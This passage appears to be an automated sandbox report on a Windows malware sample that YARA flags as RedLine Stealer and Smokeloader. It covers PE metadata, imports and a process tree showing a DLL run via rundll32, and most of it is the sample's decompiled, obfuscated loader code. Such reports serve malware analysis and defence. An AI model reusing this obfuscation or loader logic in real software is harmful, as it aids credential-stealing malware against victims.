    mov eax, dword ptr [00797AE0h]
    xor eax, ebp
    mov dword ptr [ebp-04h], eax
    push ebx
    push edi
    lea eax, dword ptr [ebp-00000518h]
    push eax
    push dword ptr [esi+04h]
    call dword ptr [00401170h]
    mov edi, 00000100h
    Programming Language:
    • [ASM] VS2008 build 21022
    • [ C ] VS2008 build 21022
    • [IMP] VS2005 build 50727
    • [C++] VS2008 build 21022
    • [RES] VS2008 build 21022
    • [LNK] VS2008 build 21022
    Name                                  Virtual Address  Virtual Size  Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
    IMAGE_DIRECTORY_ENTRY_IMPORT          0x10a9c          0x50          .text
    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3cc000         0x3050        .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_DEBUG           0x1280           0x1c          .text
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_TLS             0x2d20           0x18          .text
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2cd8           0x40          .text
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
    IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x23c         .text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
    Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
    .text  0x1000           0x107d4       0x10800   False     0.5123106060606061  data       6.1122560152151895  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .data  0x12000          0x3b9788      0x386000  unknown   unknown             unknown    unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc  0x3cc000         0x125050      0x3200    False     0.62890625          data       5.650799726445505   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    Name              RVA       Size    Type                                                                Language       Country
    JEBOPOZUSUHARAFA  0x3ce430  0x55f   ASCII text, with very long lines (1375), with no line terminators   Raeto-Romance  Switzerland
    RT_ICON           0x3cc2b0  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0        Raeto-Romance  Switzerland
    RT_ICON           0x3cc978  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0        Raeto-Romance  Switzerland
    RT_ICON           0x3ccee0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0       Raeto-Romance  Switzerland
    RT_ICON           0x3cdf88  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0       Raeto-Romance  Switzerland
    RT_STRING         0x3ceb78  0x2d8   data                                                                Raeto-Romance  Switzerland
    RT_STRING         0x3cee50  0x1fc   data                                                                Raeto-Romance  Switzerland
    RT_ACCELERATOR    0x3ce990  0xa0    data                                                                Raeto-Romance  Switzerland
    RT_GROUP_ICON     0x3ce3f0  0x3e    data                                                                Raeto-Romance  Switzerland
    RT_VERSION        0x3cea30  0x148   x86 executable not stripped
    DLL           Import
    KERNEL32.dll  OpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
    GDI32.dll     GetCharWidthA, GetCharABCWidthsA
    WINHTTP.dll   WinHttpSetOption
    Language of compilation system  Country where language is spoken
    Raeto-Romance                   Switzerland
    No network behavior found


    Target ID:0
    Start time:00:22:59
    Start date:30/11/2022
    Path:C:\Users\user\Desktop\file.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\Desktop\file.exe
    Imagebase:0x400000
    File size:3776000 bytes
    MD5 hash:2479739C5D062ECB325147623241F007
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Yara matches:
    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
    Reputation:low

    Target ID:1
    Start time:00:23:07
    Start date:30/11/2022
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
    Imagebase:0x80000
    File size:61952 bytes
    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Borland Delphi
    Reputation:high

    Target ID:3
    Start time:00:23:12
    Start date:30/11/2022
    Path:C:\Windows\SysWOW64\WerFault.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668
    Imagebase:0x8c0000
    File size:434592 bytes
    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high


      Execution Graph

      Execution Coverage:16.4%
      Dynamic/Decrypted Code Coverage:2.8%
      Signature Coverage:34.1%
      Total number of Nodes:425
      Total number of Limit Nodes:39
      C-Code - Quality: 77%
      			E00881940(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
      				intOrPtr* _v8;
      				char _v12;
      				char _v13;
      				long* _v20;
      				long* _v24;
      				char _v28;
      				int _v32;
      				char _v36;
      				char _v40;
      				signed int _v44;
      				signed int _v48;
      				signed int _v52;
      				signed int _v56;
      				signed int _v60;
      				signed int _v64;
      				signed int _v68;
      				signed int _v72;
      				signed int _v76;
      				signed int _v80;
      				char _v84;
      				signed int _v88;
      				signed int _v92;
      				void* _v93;
      				void* _v94;
      				char _v95;
      				char _v96;
      				char _v97;
      				char _v98;
      				char _v99;
      				char _v100;
      				signed int _v104;
      				char _v105;
      				char _v106;
      				char _v107;
      				char _v108;
      				char _v109;
      				char _v110;
      				char _v111;
      				char _v112;
      				char _v113;
      				intOrPtr _v120;
      				signed int _v124;
      				char _v125;
      				char _v126;
      				char _v127;
      				char _v128;
      				intOrPtr _v132;
      				char _v137;
      				char _v138;
      				char _v139;
      				char _v140;
      				char _v141;
      				char _v148;
      				char _v149;
      				char _v150;
      				char _v160;
      				intOrPtr _v164;
      				intOrPtr _v168;
      				intOrPtr _v172;
      				intOrPtr _v176;
      				intOrPtr _v180;
      				intOrPtr _v184;
      				intOrPtr _v188;
      				intOrPtr _v192;
      				intOrPtr _v196;
      				intOrPtr _v200;
      				intOrPtr _v204;
      				intOrPtr _v208;
      				intOrPtr _v212;
      				intOrPtr _v216;
      				char _v220;
      				intOrPtr _v224;
      				intOrPtr _v228;
      				intOrPtr _v232;
      				intOrPtr _v236;
      				intOrPtr _v240;
      				intOrPtr _v244;
      				intOrPtr _v248;
      				char _v252;
      				char _v256;
      				char _v260;
      				char _v264;
      				char _v268;
      				char _v272;
      				intOrPtr _v276;
      				intOrPtr _v280;
      				intOrPtr _v284;
      				intOrPtr _v288;
      				intOrPtr _v292;
      				intOrPtr _v296;
      				intOrPtr _v300;
      				intOrPtr _v304;
      				char _v308;
      				char _v312;
      				char _v316;
      				intOrPtr _v320;
      				intOrPtr _v324;
      				intOrPtr _v328;
      				intOrPtr _v332;
      				intOrPtr _v336;
      				intOrPtr _v340;
      				intOrPtr _v344;
      				intOrPtr _v348;
      				intOrPtr _v352;
      				char _v356;
      				intOrPtr _v360;
      				intOrPtr _v364;
      				intOrPtr _v368;
      				intOrPtr _v372;
      				intOrPtr _v376;
      				intOrPtr _v380;
      				intOrPtr _v384;
      				intOrPtr _v388;
      				intOrPtr _v392;
      				intOrPtr _v396;
      				intOrPtr _v400;
      				intOrPtr _v404;
      				intOrPtr _v408;
      				intOrPtr _v412;
      				intOrPtr _v416;
      				intOrPtr _v420;
      				intOrPtr _v424;
      				intOrPtr _v428;
      				intOrPtr _v432;
      				intOrPtr _v436;
      				intOrPtr _v440;
      				intOrPtr _v444;
      				intOrPtr _v448;
      				intOrPtr _v452;
      				intOrPtr _v456;
      				intOrPtr _v460;
      				intOrPtr _v464;
      				intOrPtr _v468;
      				intOrPtr _v472;
      				intOrPtr _v476;
      				intOrPtr _v480;
      				intOrPtr _v484;
      				intOrPtr _v488;
      				char _v492;
      				char _v500;
      				char _v508;
      				char _v516;
      				char _v524;
      				char _v536;
      				char _v548;
      				char _v560;
      				char _v564;
      				intOrPtr _v684;
      				intOrPtr _v688;
      				intOrPtr _v692;
      				intOrPtr _v696;
      				char _v700;
      				char _v704;
      				char _v708;
      				char _v712;
      				intOrPtr _v716;
      				intOrPtr _v720;
      				char _v724;
      				char _v728;
      				char _v736;
      				char _v1348;
      				int _t1022;
      				signed int _t1029;
      				signed int _t1031;
      				signed int _t1074;
      				intOrPtr _t1075;
      				intOrPtr _t1084;
      				signed int _t1085;
      				intOrPtr _t1133;
      				intOrPtr* _t1182;
      				intOrPtr* _t1187;
      				intOrPtr* _t1192;
      				intOrPtr* _t1197;
      				intOrPtr* _t1218;
      				intOrPtr* _t1223;
      				intOrPtr* _t1228;
      				signed int _t1262;
      				signed int _t1266;
      				signed int _t1271;
      				signed int _t1273;
      				signed int _t1275;
      				intOrPtr _t1277;
      				intOrPtr _t1280;
      				signed int _t1287;
      				void* _t1293;
      				intOrPtr _t1324;
      				intOrPtr _t1330;
      				intOrPtr _t1356;
      				intOrPtr _t1382;
      				intOrPtr _t1390;
      				signed int _t1391;
      				signed int _t1392;
      				signed int _t1401;
      				intOrPtr _t1403;
      				signed int _t1406;
      				char* _t1443;
      				char* _t1446;
      				char* _t1451;
      				char* _t1456;
      				char* _t1461;
      				char* _t1466;
      				char* _t1475;
      				char* _t1480;
      				char* _t1485;
      				signed int _t1512;
      				intOrPtr _t1545;
      				signed int _t1549;
      				intOrPtr* _t1555;
      				intOrPtr* _t1560;
      				intOrPtr* _t1565;
      				intOrPtr* _t1570;
      				signed int _t1653;
      				intOrPtr _t1658;
      				signed int _t1667;
      				signed int _t1675;
      				intOrPtr _t1680;
      				signed int _t1696;
      				signed int _t1732;
      				intOrPtr _t1735;
      				intOrPtr _t1737;
      				intOrPtr* _t1753;
      				intOrPtr* _t1758;
      				intOrPtr* _t1763;
      				intOrPtr* _t1768;
      				intOrPtr* _t1773;
      				intOrPtr* _t1778;
      				intOrPtr* _t1783;
      				intOrPtr* _t1788;
      				intOrPtr* _t1793;
      				signed int _t1877;
      				intOrPtr _t1879;
      				intOrPtr _t1881;
      				intOrPtr _t1884;
      				intOrPtr _t1886;
      				intOrPtr _t1893;
      				intOrPtr _t1895;
      				intOrPtr _t1909;
      				intOrPtr _t1911;
      				signed int _t1912;
      				signed int _t1913;
      				signed int _t1915;
      				intOrPtr* _t1929;
      				intOrPtr* _t1934;
      				intOrPtr* _t1939;
      				intOrPtr* _t1944;
      				intOrPtr* _t2013;
      				intOrPtr* _t2018;
      				char* _t2023;
      				char* _t2026;
      				void* _t2054;
      				intOrPtr _t2202;
      				intOrPtr _t2203;
      				intOrPtr _t2216;
      				intOrPtr _t2218;
      				intOrPtr _t2237;
      				intOrPtr _t2252;
      				intOrPtr _t2267;
      				intOrPtr _t2284;
      				intOrPtr _t2285;
      				intOrPtr* _t2302;
      				intOrPtr* _t2305;
      				intOrPtr* _t2309;
      				intOrPtr* _t2313;
      				intOrPtr* _t2317;
      				intOrPtr* _t2321;
      				intOrPtr* _t2327;
      				intOrPtr* _t2331;
      				intOrPtr* _t2335;
      				signed int _t2430;
      				intOrPtr _t2471;
      				intOrPtr* _t2536;
      				intOrPtr* _t2539;
      				intOrPtr _t2564;
      				intOrPtr _t2565;
      				char _t2583;
      				int _t2584;
      				void* _t2602;
      				void* _t2603;
      				char _t2627;
      
      				_t2562 = __esi;
      				_t2561 = __edi;
      				_t2053 = __ebx;
      				_t2564 = _t2565;
      				_t2054 = 0xa8;
      				do {
      					_push(0);
      					_push(0);
      					_t2054 = _t2054 - 1;
      				} while (_t2054 != 0);
      				_push(__ebx);
      				_push(__esi);
      				_push(__edi);
      				_v12 = __edx;
      				_v8 = __eax;
      				E00409D8C(_v12);
      				_push(_t2564);
      				_push(0x8852e2);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t2565;
      				_v13 = 0;
      				_push(_t2564);
      				_push(0x884f29);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t2565;
      				E0040A0C0( &_v36, _v40);
      				_v64 = _v56 + 0xe7;
      				_v80 = 0;
      				if(_v80 < 8) {
      					_t1929 =  *0x8a9d58; // 0x8b0913
      					_v95 =  *_t1929;
      					if(_v95 + 0x9f - 0x1a < 0) {
      						_v95 = _v95 - 0x20;
      					}
      					_t1934 =  *0x8a9cf4; // 0x8b0911
      					_v96 =  *_t1934;
      					if(_v96 + 0x9f - 0x1a < 0) {
      						_v96 = _v96 - 0x20;
      					}
      					_t1939 =  *0x8a9f14; // 0x8b0922
      					_v97 =  *_t1939;
      					if(_v97 + 0x9f - 0x1a < 0) {
      						_v97 = _v97 - 0x20;
      					}
      					_t1944 =  *0x8a9ce4; // 0x8b0912
      					_v98 =  *_t1944;
      					if(_v98 + 0x9f - 0x1a < 0) {
      						_v98 = _v98 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v164);
      					E0040A3C0(0);
      					_push(_v168);
      					E0040A3C0(0);
      					_push(_v172);
      					E0040A3C0(0);
      					_push(_v176);
      					E0040A3C0(0);
      					_push(_v180);
      					E0040A3C0(0);
      					_push(_v184);
      					E0040A3C0(0);
      					_push(_v188);
      					E0040A3C0(0);
      					_push(_v192);
      					E0040A3C0(0);
      					_push(_v196);
      					E0040A3C0(0);
      					_push(_v200);
      					E0040A3C0(0);
      					_push(_v204);
      					E0040A3C0(0);
      					_push(_v208);
      					E0040A3C0(0);
      					_push(_v212);
      					E0040A3C0(0);
      					_push(_v216);
      					E0040A3C0(0);
      					_push(_v220);
      					E0040A3C0(0);
      					_push(_v224);
      					E0040A3C0(0);
      					_push(_v228);
      					E0040A3C0(0);
      					_push(_v232);
      					E0040A3C0(0);
      					_push(_v236);
      					E0040A3C0(0);
      					_push(_v240);
      					E0040A3C0(0);
      					_push(_v244);
      					E0040A3C0(0);
      					_push(_v248);
      					E0040A3C0(0);
      					E0040A494( &_v160, _t2053, 0x17, _t2561, _t2562);
      					E0040A9E8( &_v36, _v160, _v252);
      					_v84 = 0;
      					_v92 = _v48 + _v48 + (_v48 + _v48) * 4;
      					_v88 = _v76 + 0xda;
      					E0040A0C0( &_v40, _v40);
      					E0040A0C0( &_v36, L"System.IO.dll");
      					E0040A0C0( &_v36, _v40);
      					E0040A0C0( &_v36, _v40);
      					_t2013 =  *0x8a9d58; // 0x8b0913
      					_v99 =  *_t2013;
      					if(_v99 + 0x9f - 0x1a < 0) {
      						_v99 = _v99 - 0x20;
      					}
      					_t2018 =  *0x8a9c3c; // 0x8b0918
      					_v100 =  *_t2018;
      					if(_v100 + 0x9f - 0x1a < 0) {
      						_t112 =  &_v100;
      						 *_t112 = _v100 - 0x20;
      						_t2583 =  *_t112;
      					}
      					_t2023 =  &_v264;
      					_t2536 =  *0x8a9ce4; // 0x8b0912
      					 *((char*)(_t2023 + 1)) =  *_t2536;
      					 *_t2023 = 1;
      					E0040A324( &_v268,  &_v264);
      					_t2026 =  &_v272;
      					_t2539 =  *0x8aa0b4; // 0x8b091f
      					 *((char*)(_t2026 + 1)) =  *_t2539;
      					 *_t2026 = 1;
      					E0040A34C( &_v268, 2,  &_v272);
      					E0040A444( &_v260, 0,  &_v268, _t2583);
      					_push(_v260);
      					E0040A3C0(0);
      					_push(_v276);
      					E0040A3C0(0);
      					_push(_v280);
      					E0040A3C0(0);
      					_push(_v284);
      					E0040A3C0(0);
      					_push(_v288);
      					E0040A3C0(0);
      					_push(_v292);
      					E0040A3C0(0);
      					_push(_v296);
      					_push(0x88532c);
      					E0040A3C0(0);
      					_push(_v300);
      					E0040A3C0(0);
      					_push(_v304);
      					E0040A3C0(0);
      					E0040A494( &_v256, _t2053, 0xb, _t2561, _t2562);
      					E0040A9E8( &_v36, _v256, _v308);
      				}
      				E0040A0C0( &_v40, _v40);
      				E0040ACEC(_v40, 1, 1,  &_v40);
      				E0040ACEC(_v36, 0, 1,  &_v40);
      				_t1022 = CryptAcquireContextA( &_v20, 0, 0, 0x18, 0xf0000000); // executed
      				_t2584 = _t1022;
      				if(_t2584 == 0) {
      					__eflags = 0;
      					_v88 = 0;
      					do {
      						_v84 = 0;
      						__eflags = _v84 - 6;
      						while(_v84 < 6) {
      							_v84 = _v84 + 1;
      							_v44 = _v60 * 0x69;
      							_v52 = _v48 + _v56;
      							_v68 = 0x2c - _v64;
      							 *0x8a9b40 =  *0x8a9af4 * 0x44;
      							 *0x8a9a40 = 0x73 -  *0x8a9a98;
      							asm("fild dword [0x8a9b18]");
      							 *0x8a9b24 = E004076E8();
      							__eflags = _v84 - 6;
      						}
      						_v88 = _v88 + 1;
      						__eflags = _v88 - 1;
      					} while (_v88 != 1);
      					E0040A0C0( &_v36, _v36);
      					 *0x8a9b08 = 0;
      					E008764FC(_t2053, _t2561, _t2562);
      					_t1029 =  *0x8a9ad4; // 0xba811226
      					 *0x8a9ad4 = E00407278(_t1029);
      					_t1031 =  *0x8a9b28; // 0xfbe6deff
      					 *0x8a9b30 = _t1031 *  *0x8a9abc;
      					E0040A0C0( &_v36, L"CustomMarshalers.dll");
      					_pop(_t2202);
      					 *[fs:eax] = _t2202;
      					__eflags = 0;
      					_pop(_t2203);
      					 *[fs:eax] = _t2203;
      					_push(E008852EC);
      					E00409D28( &_v1348, 0xd);
      					E00409D28( &_v736, 2);
      					E00409C98( &_v728);
      					E00409D28( &_v724, 0xb);
      					E00409C98( &_v564);
      					E00409D28( &_v492, 0x2d);
      					E00409D28( &_v308, 9);
      					E00409D28( &_v260, 2);
      					E00409D28( &_v220, 0x10);
      					E00409D28( &_v252, 8);
      					E00409CBC( &_v148);
      					E00409CF8( &_v40, 2);
      					return E00409CBC( &_v12);
      				} else {
      					E0040ACB4(_v40, L"System.Configuration.Install.ni.dll");
      					if(_t2584 != 0) {
      						_t1074 =  *0x8a9a28; // 0x0
      						_v104 = _t1074;
      						__eflags = _v104;
      						if(_v104 != 0) {
      							_t1915 = _v104 - 4;
      							__eflags = _t1915;
      							_v104 =  *_t1915;
      						}
      						__eflags = _v104 - 0x11;
      						if(_v104 == 0x11) {
      							_v312 = _v76 + 0xd2;
      							asm("fild dword [ebp-0x134]");
      							_v48 = E004076E8();
      							_v60 = _v52 * _v68;
      							_v72 = _v92 * _v80;
      							_t1909 =  *0x8a9b1c; // 0xfbe7a61a
      							 *0x8a9b90 = _t1909 +  *0x8a9ac0;
      							_t1911 =  *0x8a99e4; // 0x7c5162fc
      							_t1912 = _t1911 - 0x45;
      							__eflags = _t1912;
      							 *0x8a9a70 = _t1912;
      							_t1913 =  *0x8a9b78; // 0x12d6c
      							 *0x8a9ad4 = _t1913;
      						}
      					} else {
      						_v56 = 0;
      						E008764FC(_t2053, _t2561, _t2562);
      					}
      					_t1075 =  *0x8a9a64; // 0xfcfc377e
      					 *0x8a9bc0 = _t1075 +  *0x8a9a8c;
      					E0040A0C0( &_v36, _v40);
      					E0040A0C0( &_v36, _v36);
      					_v64 = 0;
      					_t2585 = _v64 - 3;
      					while(_v64 < 3) {
      						_v64 = _v64 + 1;
      						 *0x8a9a88 = 0;
      						E0087301C(_v56, _t2053, _v52, _v44, _t2585, _v64);
      					}
      					if(_v72 + _v64 <= _v64) {
      						_t1084 =  *0x8a9a6c; // 0xfbe7a61a
      						_t1085 = _t1084 - 0x24;
      						__eflags = _t1085;
      						 *0x8a9a8c = _t1085;
      					} else {
      						if(E0040AEFC(L"RtlDelete", 1, _v40) - 1 >= 0) {
      							_t1877 =  *0x8a9a9c; // 0xa3011753
      							 *0x8a9abc = _t1877 + 0xb3;
      							_t1879 =  *0x8a9b24; // 0xfbe6de1a
      							 *0x8a9b3c = _t1879 + 0xaf;
      							_t1881 =  *0x8a9b88; // 0x2c903efa
      							 *0x8a9bb0 = _t1881 + 0xac;
      							 *0x8a9a9c =  *0x8a9a70 * 0xa9;
      							_t1884 =  *0x8a9b38; // 0xfcbf7485
      							 *0x8a9b1c = _t1884 - 0x40;
      							_t1886 =  *0x8a9a58; // 0x4192234
      							 *0x8a9b7c = _t1886 + 4;
      						} else {
      							asm("fild dword [0x8a9b84]");
      							 *0x8a9a78 = E004076F4();
      							 *0x8a9aec = E008A9B04 * 0xc6;
      							 *0x8a9b64 =  *0x8a9b70 * 0xc3;
      							 *0x8a99e4 = 0xf4 -  *0x8a9ae4;
      							_t1893 =  *0x8a9b94; // 0x74d3d361
      							 *0x8a9aa4 = _t1893 + 0x8a;
      							_t1895 =  *0x8a9ac8; // 0x6009aad3
      							_v312 = _t1895 + 0x21;
      							asm("fild dword [ebp-0x134]");
      							 *0x8a9b24 = E004076E8();
      						}
      					}
      					_push(_t2564);
      					_push(0x884b2e);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t2565;
      					_v80 = 0;
      					while(_v80 < 0xc) {
      						_v80 = _v80 + 1;
      						_v60 = _v56 - _v64;
      						_t2590 = _v80 - 0xc;
      					}
      					 *0x8a9b88 = 0;
      					_t2216 =  *0x8a9aa4; // 0x58cb7cf7
      					E0087FA9C(_v56, _t2216, _t2590);
      					_v72 = _v84;
      					_v48 = _v52 + 0xc3;
      					_v76 = _v44 - _v92;
      					E0040A0C0( &_v36, _v40);
      					_push( &_v28);
      					_push(0);
      					_push(0);
      					_push(0x8003);
      					_push(_v20);
      					if( *0x8b124c() == 0) {
      						_pop(_t2218);
      						 *[fs:eax] = _t2218;
      						_push(E00884B38);
      						CryptReleaseContext(_v20, 0);
      						E0040ACEC(_v36, 0, 1,  &_v36);
      						_v72 = _v84 + 0x24;
      						_v80 = 0;
      						__eflags = _v80 - 3;
      						while(_v80 < 3) {
      							_v80 = _v80 + 1;
      							_v56 = 0;
      							__eflags = _v56 - 0xb;
      							while(_v56 < 0xb) {
      								_v56 = _v56 + 1;
      								_v44 = _v52 + 0x9a;
      								E0040A0C0( &_v36, _v36);
      								E0040ACEC(_v40, 1, 1,  &_v36);
      								_v68 = _v76 + _v76 * 8 + (_v76 + _v76 * 8) * 8;
      								E0040A0C0( &_v40, _v36);
      								E0040A0C0( &_v36, _v40);
      								__eflags = _v56 - 0xb;
      							}
      							__eflags = _v80 - 3;
      						}
      						E0040A0C0( &_v40, _v36);
      						E0040A0C0( &_v36, _v40);
      						__eflags = 0;
      						return E0040ACEC(_v36, 0, 1,  &_v40);
      					} else {
      						_push(_t2564);
      						_push(0x88495d);
      						_push( *[fs:eax]);
      						 *[fs:eax] = _t2565;
      						_t1133 =  *0x8a99d4; // 0x0
      						E0040ACB4(_t1133, L"OleCreateFromDataEx");
      						if(0 != 0) {
      							__eflags = _v76 - _v80 - _v76;
      							if(_v76 - _v80 < _v76) {
      								_t1753 =  *0x8aa1dc; // 0x8b0921
      								_v105 =  *_t1753;
      								__eflags = _v105 + 0x9f - 0x1a;
      								if(_v105 + 0x9f - 0x1a < 0) {
      									_t262 =  &_v105;
      									 *_t262 = _v105 - 0x20;
      									__eflags =  *_t262;
      								}
      								_t1758 =  *0x8a9fcc; // 0x8b0927
      								_v106 =  *_t1758;
      								__eflags = _v106 + 0x9f - 0x1a;
      								if(_v106 + 0x9f - 0x1a < 0) {
      									_t266 =  &_v106;
      									 *_t266 = _v106 - 0x20;
      									__eflags =  *_t266;
      								}
      								_t1763 =  *0x8aa15c; // 0x8b091c
      								_v107 =  *_t1763;
      								__eflags = _v107 + 0x9f - 0x1a;
      								if(_v107 + 0x9f - 0x1a < 0) {
      									_t270 =  &_v107;
      									 *_t270 = _v107 - 0x20;
      									__eflags =  *_t270;
      								}
      								_t1768 =  *0x8aa1dc; // 0x8b0921
      								_v108 =  *_t1768;
      								__eflags = _v108 + 0x9f - 0x1a;
      								if(_v108 + 0x9f - 0x1a < 0) {
      									_t274 =  &_v108;
      									 *_t274 = _v108 - 0x20;
      									__eflags =  *_t274;
      								}
      								_t1773 =  *0x8a9ffc; // 0x8b091a
      								_v109 =  *_t1773;
      								__eflags = _v109 + 0x9f - 0x1a;
      								if(_v109 + 0x9f - 0x1a < 0) {
      									_t278 =  &_v109;
      									 *_t278 = _v109 - 0x20;
      									__eflags =  *_t278;
      								}
      								_t1778 =  *0x8a9e60; // 0x8b0923
      								_v110 =  *_t1778;
      								__eflags = _v110 + 0x9f - 0x1a;
      								if(_v110 + 0x9f - 0x1a < 0) {
      									_t282 =  &_v110;
      									 *_t282 = _v110 - 0x20;
      									__eflags =  *_t282;
      								}
      								_t1783 =  *0x8aa15c; // 0x8b091c
      								_v111 =  *_t1783;
      								__eflags = _v111 + 0x9f - 0x1a;
      								if(_v111 + 0x9f - 0x1a < 0) {
      									_t286 =  &_v111;
      									 *_t286 = _v111 - 0x20;
      									__eflags =  *_t286;
      								}
      								_t1788 =  *0x8a9f14; // 0x8b0922
      								_v112 =  *_t1788;
      								__eflags = _v112 + 0x9f - 0x1a;
      								if(_v112 + 0x9f - 0x1a < 0) {
      									_t290 =  &_v112;
      									 *_t290 = _v112 - 0x20;
      									__eflags =  *_t290;
      								}
      								_t1793 =  *0x8a9f14; // 0x8b0922
      								_v113 =  *_t1793;
      								__eflags = _v113 + 0x9f - 0x1a;
      								if(_v113 + 0x9f - 0x1a < 0) {
      									_t294 =  &_v113;
      									 *_t294 = _v113 - 0x20;
      									__eflags =  *_t294;
      								}
      								E0040A3C0(0);
      								_push(_v320);
      								E0040A3C0(0);
      								_push(_v324);
      								E0040A3C0(0);
      								_push(_v328);
      								E0040A3C0(0);
      								_push(_v332);
      								E0040A3C0(0);
      								_push(_v336);
      								E0040A3C0(0);
      								_push(_v340);
      								_push(0x88532c);
      								E0040A3C0(0);
      								_push(_v344);
      								E0040A3C0(0);
      								_push(_v348);
      								E0040A3C0(0);
      								E0040A494( &_v316, _t2053, 0xa, _t2561, _t2562);
      								E0040A9E8( &_v40, _v316, _v352);
      								E0040A0C0( &_v36, _v36);
      								E0040A0C0( &_v40, _v36);
      								E0040A0C0( &_v36, _v36);
      								E0040ACEC(_v40, 1, 1,  &_v36);
      								E0040A0C0( &_v40, _v36);
      							}
      						} else {
      							if(_v60 - _v64 == _v76) {
      								asm("fild dword [ebp-0x3c]");
      								_v88 = E004076E8();
      								_v48 = _v68 * 0xe2;
      								_v56 = _v84 - 0xd6;
      								_v72 = _v76 - _v60;
      								E0040A0C0( &_v40, _v36);
      								E0040A0C0( &_v36, _v36);
      							}
      							_t2471 =  *0x8a99d4; // 0x0
